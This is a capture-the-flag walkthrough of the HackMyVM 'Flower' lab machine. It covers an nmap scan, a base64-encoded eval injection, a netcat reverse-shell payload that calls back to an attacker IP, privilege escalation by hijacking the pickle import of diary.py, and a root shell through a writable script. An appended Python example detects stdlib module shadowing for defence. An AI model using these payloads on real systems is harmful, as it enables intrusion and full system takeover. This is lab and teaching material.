2021-01-12 03:03:30 +05:00


HackMyVM-Flower

NMAP

Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-12 02:02 PKT
Nmap scan report for dominator.hmv (192.168.1.6)
Host is up (0.000079s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
MAC Address: 08:00:27:8D:A3:F6 (Oracle VirtualBox virtual NIC)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.12 seconds

PORT 80

Running gobuster shows that there is only an index.php.

Looking at the source code of the web page, we see that the value is actually base64-encoded text.

These values are sent to the server, which is probably passing them to eval, so the input can be exploited by base64-encoding the payload and substituting it for the original value.

To get a reverse shell, base64-encode system('nc 192.168.1.8 2222 -e /bin/bash') and do exactly the same thing.

Now we know that diary.py can be run as user rose, and that it imports the Python library named pickle.

We can create a malicious module named pickle.py and place it in the same directory as diary.py, because Python searches the directory of the script being executed before the standard library when importing.
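As an added example that is not part of the original writeup, here is a defender-side check for the module-shadowing issue just described: it audits a script's directory for files whose names collide with standard-library modules, and shows what `import pickle` would resolve to with and without the script directory on sys.path. The temporary directory, the harmless decoy pickle.py and notes.py are constructed here for the demonstration.

```python
"""Defensive check for Python stdlib module shadowing (added example).

diary.py runs via sudo and imports pickle; because Python puts the script's
own directory at sys.path[0], a pickle.py dropped next to it is imported
instead of the real module. This audits a script's directory for such
collisions and shows what a given import name would actually resolve to.
"""
import os
import sys
import sysconfig
import tempfile
from importlib.machinery import PathFinder
from pathlib import Path

# Top-level stdlib module names (Python 3.10+); tiny fallback for older versions.
STDLIB_NAMES = frozenset(getattr(sys, "stdlib_module_names", ("pickle", "os", "sys")))
STDLIB_DIR = os.path.realpath(sysconfig.get_paths()["stdlib"])


def shadowing_files(script_dir):
    """Names in script_dir (x.py files or packages) that collide with stdlib modules."""
    hits = set()
    for entry in Path(script_dir).iterdir():
        if entry.suffix == ".py" and entry.stem in STDLIB_NAMES:
            hits.add(entry.stem)
        elif entry.is_dir() and (entry / "__init__.py").exists() and entry.name in STDLIB_NAMES:
            hits.add(entry.name)
    return sorted(hits)


def resolve_origin(module_name, search_path):
    """File the import system would load for module_name given this path order."""
    spec = PathFinder.find_spec(module_name, list(search_path))
    return spec.origin if spec else None


def is_stdlib_origin(origin):
    """True if the resolved file lives under the interpreter's stdlib tree."""
    return origin is not None and os.path.realpath(origin).startswith(STDLIB_DIR + os.sep)


def demo():
    """Constructed scenario: a privileged script with a harmless decoy pickle.py beside it."""
    with tempfile.TemporaryDirectory() as script_dir:
        Path(script_dir, "diary.py").write_text("import pickle\n")
        Path(script_dir, "pickle.py").write_text("MARKER = 'decoy'\n")  # harmless stand-in
        Path(script_dir, "notes.py").write_text("")
        shadowed = shadowing_files(script_dir)
        # Default behaviour: the script directory is first on sys.path, so the decoy wins.
        hijacked = resolve_origin("pickle", [script_dir] + sys.path)
        # Hardened behaviour (python -I, or -P on 3.11+): script directory is not searched.
        safe = resolve_origin("pickle", [p for p in sys.path if p and p != script_dir])
        return {"shadowed": shadowed,
                "default_is_stdlib": is_stdlib_origin(hijacked),
                "isolated_is_stdlib": is_stdlib_origin(safe)}


if __name__ == "__main__":
    print(demo())
```

Running the same audit on the real directory holding a sudo-runnable script (and removing or renaming any hit) is the practical mitigation, alongside invoking such scripts with an interpreter flag that keeps the script directory off sys.path.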

Running sudo -l again as rose:

As .plantbook is writable, add /bin/bash to the file and then run it as root.